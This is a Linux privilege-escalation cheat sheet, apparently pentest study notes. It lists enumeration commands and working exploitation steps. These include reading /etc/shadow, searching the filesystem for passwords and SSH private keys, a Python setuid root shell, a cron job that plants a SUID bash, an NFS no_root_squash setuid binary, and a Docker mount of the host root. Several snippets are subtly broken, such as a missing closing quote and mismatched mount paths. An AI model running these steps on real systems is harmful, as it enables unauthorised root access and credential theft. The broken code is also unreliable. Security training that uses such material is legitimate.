Linux privilege escalation
Manual enumeration
User
whoami
id
historyOther Users
cat /etc/passwd
whoPrivileges
sudo -l
cat /etc/sudoersFile system
pwd (current location)
echo $PATHHostname
hostnameOS and architecture
cat /etc/issue
cat /etc/*-release
uname -a
lscpuProcesses and services
ps auxNetwork
ifconfig OR ip a (interfaces)
route OR route l (routing table)
netstat -anp OR ss -anp (active connections)
arp -aScheduled tasks
ls -lah /etc/cron* (contents of all cron files)
cat /etc/crontab (admins often add jobs here, usually run w/ root privs)
cat var/log/cron.log (inspect for running cron jobs)Applications/patch levels/drivers/kernel modules
dpkg -l
lsmod (lists all kernel modules loaded)
/sbin/modinfo $modulename (more info on specific kernel modules - libata in this example)Readable/writeable directories
find / -writeable -type d 2>/dev/nullUnmounted disks
mount
cat /etc/fstab (drives mounted at boot)
lsblk (all available disks)Sensitive files
history
cat /etc/passwd
cat /etc/shadow
cat /etc/group Passwords
Search the file system for passwords. Try additional search terms (pass, etc.).
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/nullSSH keys
Search the filesystem for SSH keys. Public keys are typically stored in the "authorized_keys" folder, private keys are stored as "id_rsa".
find / -name id_rsa* 2> /dev/null
find / -name authorized_keys* 2> /dev/nullAutomated tools
LinPeas.sh
LinEnum.sh
Linux Exploit Suggester
LinuxPrivChecker.pyExploitation paths
SUID Files
SUID files allow individuals to execute files using the privileges of another user. They are identifiable by an "s" in the third character of the root permissions for a file. You can search manually with:
find / -perm -u=s -type f 2>/dev/nullIf you find identify a SUID file, check GTFO bins for exploits
Capabilities
The exploitation for capabilities is similar to that of SUID files. Search for capabilities with:
getcap -r / 2>/dev/nullLook for "+ep" at the end of any returned items. If present, exploitation possible.
Execution
Run Python to escalate
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")Other possibly exploitable capabilities include perl, tar, openssl (check GTFO bins)
Scheduled Tasks
cat /etc/cron*
cat /etc/crontab (admins often add jobs here, usually run w/ root privs)
cat var/log/cron.log (inspect for running cron jobs)
systemctl list-timers --allColumns represent minute, hour, day of month, month, day of week. Asterisks in columns indicate "all", asterisks in all fields indicates that the task runs every minute/hour/day of month/month/day of week
Exploitation
First, check the file type using the file command and whether or not you have write access. Sometimes replacing the file with one created on your attacking machine is easier than modifying the file that is in place. If so, rename the current file as *.old and use wget to replace with the version created on your attack machine.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > script
**Wait for the job to execute, then
/tmp/bash -pNFS root squashing
Check cat /etc/exports for results indicating "no_root_squash", indicating folders that are shareable and can be mounted. If available, remote commands are executed as root.
Exploitation
From the attacking machine:
Search for mountable shares
showmount -e ipaddressCreate a new directory:
mkdir /tmp/mntmeMount the folder:
mount -o rw, vers=2 ipaddress:/tmp /tmp/mountmeCreate malicious file:
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; /tmp/mountme/x.cCompile the file:
gcc /tmp/mountme/x.c -o /tmp/mountme/xReturn to the victim machine, navigate to the target directory (/tmp), and execute the file
./xDocker
If you are in the Docker group, check to see which containers are available:
docker image lsRun the image:
docker run -v /:/mnt --rm -it alpine chroot /mnt shLast updated